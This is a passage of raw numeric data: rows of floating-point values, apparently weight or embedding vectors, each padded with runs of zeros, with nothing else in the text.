0.115979, 0.461579, 2.11008, 0.0499943, 0.327122, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.230536, -0.00819474, -0.06855, 0.0448088, -0.223975, -0.542313, 0.218674, 0.252032, -0.14038, 0.0860394, 0.173627, -0.538887, -0.0170857, -0.0256953, -0.215217, -0.0328605, -0.223916, 0.0864775, 0.16766, -0.355633, 0.104663, -0.00674624, 0.018833, 0.00893512, 0.00664579, 0.225743, -0.156968, 0.00890001, -0.215367, 0.112971, 0.39514, 0.358788, -0.132104, -0.329971, -0.154667, -0.0224272, -0.150939, -0.0948775, 0.162848, -0.0030095, -0.148377, -0.0701213, 0.37609, 0.316339, -0.0239319, 0.121253, -0.331359, -0.209862, 0.0345536, 0.255761, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.54737, 0.126344, 0.33411, 0.717981, 0.0883363, 0.991426, 0.148556, 0.413172, -3.19024, -0.756516, 0.495036, -0.433314, -0.72594, 0.209025, 0.0276909, -0.000542997, -0.284336, -0.846839, 0.681862, -0.463437, -0.34728, 0.13391, -0.0137406, 0.0214914, 0.0231283, 0.515972, -0.295743, -0.0839817, -0.330496, -0.10813, -0.00786992, 0.177013, 2.26378, 0.410262, 0.786648, -0.15808, -0.801914, -0.491058, 0.0593445, -1.18496, -0.153509, -2.11129, -0.133756, 0.346528, 0.435979, 0.507968, -0.239302, 0.434813, 0.0898213, 0.0229776, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.223001, 1.13404, -1.59523, -0.28979, -0.326286, 0.0395743, -0.250676, 0.178945, -0.491634, 0.215334, -0.237242, -0.824158, -0.309949, 0.151969, -0.528733, 0.0368399, 0.391899, -0.385338, 0.188172, 0.307479, -0.287544, -0.117552, 0.192367, -0.00368197, 0.0385067, -0.366204, 0.350237, 0.525193, 0.488556, 0.778827, 0.0570012, -0.232371, 2.02219, -0.345551, 2.53127, 0.453243, 0.090101, -0.285315, -1.33723, 0.974386, 0.196762, 0.0615366, 0.378096, 0.175499, 0.0359751, -0.184549, -0.8556, -0.204759, 0.127161, 0.56873, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0131053, -0.0136146, 0.00670848, 0.00288815, -0.0564016, -0.0227677, -0.00507437, -0.031917, 0.0122272, -0.0410778, 0.0299648, -0.00969436, 0.0408508, 0.0312088, -0.0382029, 0.0431488, -0.0121752, -0.00471847, 0.0132384, 0.0363017, 0.00231722, -0.0259732, -0.0522198, -0.0136057, -0.023365, -0.0275964, -0.00966017, 0.00596633, 0.00490808, 0.00306836, -0.0187773, 0.0202049, -0.0176302, -0.0329855, 
-0.0264893, -0.0332673, 0.0346079, 0.00395447, -0.0419245, 0.0179206, -0.0323322, 0.0317468, -0.0520488, -0.0532633, 0.00012942, -0.0239133, -0.00441817, -0.0320353, 0.0111189, 0.00876436, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.5919, -0.388482, -0.167854, -0.0654621, 0.183011, 0.698278, -0.364691, 0.771179, -0.534327, 0.538842, -0.0886628, -0.163222, 1.15133, -0.0319073, -0.0910775, -0.00798116, 0.254573, 0.301434, 0.632051, 0.733379, 0.991705, -0.286001, -0.175332, -0.0319371, -0.0201389, -0.152725, -0.288123, -0.637127, -1.51372, 0.235774, -0.237466, 0.586131, -1.12468, 0.573768, 0.151709, -0.356991, -2.46592, -0.193679, 0.0533088, -1.33711, -0.245567, -0.324767, -0.0732654, 0.0236882, -0.0483518, -2.47549, -2.09975, -0.0217902, 0.110563, 0.175483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.98408, 0.910592, -0.0600255, 0.353189, -1.19002, 0.0800286, -0.771398, -0.524373, 0.308754, 0.784854, 0.383238, -0.944591, 0.799016, -0.381329, 1.48239, -0.0019988, -1.09457, -0.34209, -0.880602, 0.128874, 0.553916, -0.652839, -0.44951, 0.00634436, -0.015117, 0.347821, 0.200012, 0.00622142, 0.208426, -0.518804, -0.0796938, -0.562364, -0.0155025, -0.00978837, -0.537485, -0.577528, 0.372109, -0.671776, -0.262451, -0.718552, 0.0909849, -0.213349, 0.0982192, -0.358495, 0.718444, -3.21966, 0.663638, -0.428151, -0.784072, -0.349844, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0], [-0.846377, 0.0520959, -0.718714, 0.00411009, -0.233394, 0.278327, -0.195366, 0.115785, -0.162096, 0.174486, 0.648973, 0.348923, -0.484818, -0.568987, -0.625222, -0.0479618, 1.11466, -0.159343, 0.577442, -0.0874765, -0.0240376, -0.105745, 0.159636, 0.00693703, -0.00155582, 0.393865, -0.0767706, -1.00687, -0.462243, 0.00461545, 0.336, -0.200073, 0.406677, -0.018782, 0.302943, -0.587313, 0.324633, 0.159269, -0.0117235, -0.359756, 0.131851, 0.123657, -0.0975068, -0.267502, 0.412216, 0.420455, 0.458763, 0.315052, 0.0390779, 0.684284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.11135, 0.0259312, 0.379167, 0.217057, -0.441625, -0.141644, 0.323883, -0.150831, -0.0146716, 0.769249, -0.0752434, 0.777941, 0.101847, 0.0641381, -0.023042, 0.0258893, 0.889159, -0.0177214, 0.414503, -0.238582, -0.124547, -0.0325948, -0.241848, -0.0215171, 0.0205436, 0.325269, 0.324439, -0.0187689, -1.64957, 0.0955764, 0.303657, -0.29347, -1.10382, 0.515836, -0.922844, -0.205015, 0.31502, -0.310876, -0.0721522, 0.849182, 0.730565, 0.893679, 0.564884, 0.106115, -0.116744, -0.814282, -0.26168, -0.523659, -1.1603, -0.136586, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.01615, -4.05499, -0.262902, -0.571711, 0.17747, 0.756045, 0.556274, -0.772084, -2.6943, -0.10044, -4.39544, -0.150447, 0.811485, -0.0732979, 0.936131, 0.0330499, 0.227866, -1.14576, -0.512806, 0.0655494, 0.0419259, 0.267803, 0.0253937, 0.0253669, 0.0156294, 0.252737, -0.0292657, 0.00178878, 1.97356, 0.400268, -0.232988, -0.308826, 1.80062, 0.151196, -1.55502, -0.882074, 1.05251, 0.3122, -0.0979487, 2.1647, 
-0.218555, 0.286177, 1.05413, -0.160906, 0.0528782, -0.667814, -0.615577, 0.232438, -0.0828356, 0.0254076, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0170114, 0.0285327, -0.0410167, -0.012994, -0.00167207, -0.0238647, -0.0326712, -0.0490662, -0.0442938, -0.0324038, -0.00787427, -0.00306703, -0.050859, 0.00863903, -0.0373346, -0.00416204, -0.0567809, -0.00933463, -0.0611227, 0.0107885, 0.00421092, 0.021868, -0.0493151, 0.0306707, -0.0076208, -0.0279363, -0.0107116, 0.000827201, -0.0273795, -0.0475977, 0.0218551, -0.0349687, 0.00386473, -0.0128086, -0.0402414, 0.00832431, 0.0172225, -0.0008524, -0.0012729, -0.00231625, 0.0368154, 0.0195299, 0.0271765, -0.0443422, 0.0118703, -0.0199886, -0.0356111, -0.00439261, 0.0132566, 0.0109279, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0501081, 0.60103, -0.485923, 0.398342, -0.722098, -0.765445, -0.195573, -0.209708, -0.594946, 0.292866, -0.20046, -0.677279, -0.595361, 0.131226, -0.188303, -0.0175561, -0.634408, -0.00900963, -0.0629575, -0.53843, -0.161467, 0.10013, 0.576146, 0.0598586, -0.00145817, -0.739675, 0.537508, 0.365237, -0.445162, 0.477253, 0.686857, 0.112942, 1.29285, -0.442391, -0.234827, -0.446172, -0.106022, -0.462136, 0.719057, -0.89006, -0.295949, -0.189294, 0.445483, 0.0251899, 0.0127066, 0.656836, -0.326815, -1.44461, 0.308931, 0.577917, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.101505, 
-1.33299, -0.47686, -0.607576, 1.16175, 0.366273, -0.478202, -1.54508, 0.0948004, -0.376596, 0.386784, -0.808952, 0.0679895, -1.28861, -0.646332, -0.0149182, -0.447404, 0.0981967, -0.341404, -0.0352556, -0.592438, -0.722112, 0.29955, -0.0309172, 0.00942818, 0.312844, -0.644849, 0.54818, 3.86582, -0.216747, -0.95272, -0.0307269, -0.26783, 0.813811, 0.567783, 2.5683, -1.27553, 1.11669, 0.0364032, 1.10831, 1.01186, 1.34957, -2.26959, -0.344441, -0.110769, -0.573064, 0.875236, -2.96192, -0.636555, 0.351108, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.118821, -0.711704, -0.483826, -0.711152, 0.224225, 0.504476, -1.07138, 0.14483, 0.442006, -0.4319, 0.335898, -0.438699, 0.0901052, 0.382978, 0.520548, -0.0279068, 0.472178, 0.276704, 0.56856, 0.0600448, -0.421549, 0.211137, -0.507163, 0.023661, -0.00295901, -0.0511164, 0.802445, 0.061451, 2.99368, -0.159137, -0.521687, 0.607983, 0.367896, -0.0924293, -1.00305, -0.29721, 0.168724, 0.174405, 0.360866, -0.758413, -0.745258, -0.468658, 0.147287, -0.731458, 0.08567, -3.41705, -1.04195, -1.05976, -0.228164, 0.354267, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0231191, -0.0191129, 0.0131136, 0.0141995, -0.0249854, -0.0166232, -0.00533991, -0.0547539, -0.0119782, -0.000758512, 0.02611, -0.0312707, -0.0487335, 0.0204541, 0.0230853, -0.0266967, 0.0276805, -0.0513139, 0.0263219, 0.0123733, -0.049789, -0.0241865, 0.0231673, -0.0153336, 0.00488566, -0.0110052, -0.0164689, -0.044506, -0.0251296, -0.0254321, 0.0363359, -0.000538926, 0.00512794, -0.0186671, 0.0301295, -0.0470245, -0.0253187, -0.00574005, 0.0126691, 
-0.00599197, -0.05047, -0.0235241, 0.00215916, 0.0188486, -0.0047503, -0.0494921, -0.0430759, 0.00985635, -0.0106318, -0.0544856, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00899037, -0.00991475, -0.0654187, -0.00634113, 0.0315086, -0.00371812, 0.020114, 0.0262322, -0.0595457, 0.0147716, 0.00936178, -0.0453068, -0.0513146, 0.0287964, -0.0349374, 0.0272747, -0.0444495, 0.015091, -0.0115782, 0.0106196, -0.056498, -0.0199807, -0.0180056, 0.0326467, 0.000317171, -0.0443625, 0.0418722, -0.0200461, 0.0214828, -0.00155139, -0.0421826, 0.00579827, 0.0101929, -0.00562787, -0.0365458, -0.001269, -0.0111437, -0.0241591, 0.0215608, -0.0151014, -0.0414119, -0.0302684, -0.0130698, 0.031025, -0.0490104, -0.0351308, 0.0409983, -0.0416246, 0.0218909, -0.0249918, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.417677, 0.178378, -0.159165, 0.00756481, 0.36328, 0.292867, -0.000663777, -0.350055, -0.0189875, -0.300583, -0.131264, 0.325389, -0.397865, 0.238333, 0.335681, 0.00196719, 0.0893672, -0.0614185, 0.247462, 0.154183, -0.110438, 0.469841, -0.243611, 0.0299908, 0.00118584, -1.40512, 0.0589059, 0.0685535, 0.876802, -0.281117, -0.192992, 0.221137, -0.944871, 0.173591, -0.323839, -0.220512, -0.163621, 0.171892, -0.0217363, -0.369812, 0.0905784, -0.26121, 0.166026, 0.304108, 0.130296, -0.208825, 0.104663, 0.0569632, -0.472228, 0.00827289, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0], [-0.352834, 0.0912263, -0.293044, 0.444613, -0.671747, 0.714586, 0.660366, -0.917384, -0.164593, 0.0289918, -2.84676, -0.421595, -0.38543, 0.916431, -0.483114, 0.013907, -0.40374, -2.51905, -0.459355, 0.111568, -0.204692, 0.149458, 0.13239, 0.0392036, 0.0298877, 0.998619, -0.529835, -0.18192, -0.720733, -0.058407, -0.695292, -2.23782, 0.256593, 0.192768, 0.373367, -0.876898, 0.905971, 0.655965, -0.177277, 0.0885312, 0.429833, -0.220705, -0.047216, 0.816202, -0.000984705, 0.645541, 0.00651273, 0.803117, 0.30903, 0.263423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0354195, 0.757284, 0.148779, 0.0329312, -0.461128, 0.308481, 0.975617, 0.611835, 0.372968, -0.232524, 1.08012, 1.47459, -0.260563, -0.919272, 0.789708, -0.000633168, -0.666059, 0.187748, -0.140832, 0.692789, -0.0823575, 1.02284, -0.523266, -0.0151545, -0.0164329, -0.452662, 0.510691, 0.703769, 1.50028, -0.59606, -0.0238806, -0.658597, -1.00742, 0.831208, 0.296629, -0.260439, -1.31254, 0.237762, -0.00840255, -0.933356, -0.247145, 0.377014, 0.575535, -0.534841, -0.59269, 0.776199, -1.35765, -1.32483, -0.651175, 0.0227004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2932, -0.2186, -0.5493, 0.2279, -0.11475, 0.1138, -0.07056, 0.02242, 0.7627, 0.0477, -0.1273, 0.0002131, -0.3425, 0.05667, 0.08405, -0.0005946, 0.0995, 0.11, 0.213, 0.0834, 
-0.2651, -0.1914, 0.1572, -0.03207, 0.004093, -0.182, 0.3267, -0.3572, 0.6406, 0.2155, -0.1965, 0.1221, 0.2067, 0.497, -0.1316, 0.0066, -0.3435, -0.11816, -0.02136, -0.3958, 0.03726, 0.3088, 0.03418, -0.144, -0.3022, -0.1399, 0.02702, 0.2515, -0.3591, 0.471], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.249, 1.089, 0.3674, -0.2532, 0.1567, 0.3682, -0.336, -0.1658, 0.1515, -0.12115, 0.7803, -0.285, -1.302, 0.3896, 0.1093, -0.04117, 0.3308, 1.059, -0.4248, -0.1078, -0.4902, 0.8325, 0.2805, -0.01112, -0.04376, 0.3037, 0.2441, 0.4985, 0.1489, 0.4443, -0.1098, 0.627, 1.044, 0.2252, -3.008, 0.335, -0.2617, -0.581, -0.839, -0.03754, 0.04303, -0.02931, 0.4104, -0.669, -0.2866, -0.5093, 0.817, 0.6045, -0.05106, 0.4856], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5166, 0.1886, 0.1539, 0.06836, -0.02188, 0.3774, -0.3218, -0.6235, 0.08795, -0.294, 0.08594, -0.03867, -0.201, -0.4426, 0.9907, -0.043, -0.1682, -0.3997, -0.05908, 0.2118, -0.0147, -0.459, -0.2522, -0.03065, 0.01724, 0.159, 0.3293, 0.4985, -0.2622, 0.2499, 0.2764, -0.4207, -0.43, 0.1421, 0.05713, -0.2327, -0.1653, 0.0359, 0.2637, 0.126, 0.2942, 0.06366, -0.02396, -0.1853, 0.4502, 0.1484, -0.6006, -0.7285, 0.0984, -0.0777], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5234, -1.177, 0.2394, 0.2942, -0.029, 0.2922, -0.04828, 0.2712, 0.1209, -0.11505, -0.2166, 0.498, 0.3772, -0.629, 0.202, -0.0395, 
0.2695, -0.2428, -0.1715, -0.678, 0.6636, -0.3938, -0.0882, 0.02975, 0.04352, 0.3208, 0.3164, -1.14, 0.1204, 0.010895, -0.276, -0.2405, -0.1312, -0.894, -0.408, -0.3381, -0.756, -0.875, -0.06155, 0.174, -0.2032, 0.5415, 0.2073, -0.1902, 0.11554, 0.4824, 0.01399, 0.1295, 0.415, -0.168], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.64, 0.1516, 0.1594, -0.1923, 0.3599, -0.38, 0.08026, 0.3828, 0.7046, -0.4243, 0.3425, 0.6074, -0.5137, -0.5054, 0.635, 0.01695, -0.0168, -0.1198, -0.1831, -0.215, 0.04346, -0.5757, -0.961, -0.01688, 0.00911, 0.8984, 0.2062, -0.7095, -1.366, 0.313, -0.2502, 0.1315, -0.2206, 0.33, -0.956, 0.1471, 0.638, 0.1798, 0.2247, 0.821, -0.2328, 0.4424, 0.3894, 0.1791, 0.3767, -0.4788, -0.0866, 0.992, -0.8677, 0.11017], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7256, -0.11066, 0.00872, -0.0552, 1.046, -0.1066, -1.7, 0.216, -0.09796, 0.01694, 1.114, -0.4917, -0.306, -0.3828, -0.8823, 0.0358, -0.925, 0.628, -0.6553, 0.2495, 0.4836, 0.2179, -0.03244, 0.01291, -0.01784, -0.503, -0.306, -0.9414, -0.5737, -0.206, -0.7397, 0.5317, -0.01101, 0.477, 0.925, 0.924, -1.279, -0.205, -0.003283, -1.599, -0.0433, 0.1062, -0.1598, -0.4377, -0.657, 0.3809, -0.75, -1.653, 0.7456, 0.08154], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6094, -0.1779, -0.03326, -0.1672, 0.1416, -0.396, -2.176, -1.069, -0.6577, -0.3347, 0.341, 0.2834, -0.01735, -0.03995, 
-1.094, -0.04706, 0.566, -2.78, -0.3613, -0.00363, 0.1675, 0.4365, -0.1926, 0.01848, 0.03583, 0.4338, 0.03207, 0.3457, -0.1918, 0.506, 0.58, 0.0699, -0.685, -1.133, 0.10455, 0.2433, -0.0986, -0.01128, -0.4663, 0.3594, 0.2151, -0.03406, -0.0634, -0.2065, -0.014435, 0.5273, 0.5146, -0.04135, 0.3887, 0.3435], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0657, 0.429, 0.02196, 0.1827, -0.648, -0.237, -1.117, -0.3389, -0.4438, 0.724, -1.848, -1.192, 0.2008, 0.451, -0.1766, -0.00829, -1.668, -0.3035, 0.09973, -0.6694, -1.142, -0.166, -0.0786, 0.004467, 0.02026, 0.676, 0.05112, -0.0744, 0.6855, -0.0736, 0.01846, -0.437, 0.4282, 0.2046, -0.6763, -0.1242, 1.878, 0.2886, -0.07367, 0.771, 0.338, 0.5923, -0.0406, 0.0772, 0.3364, 0.5737, 1.036, -0.2292, -0.703, 0.004997], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 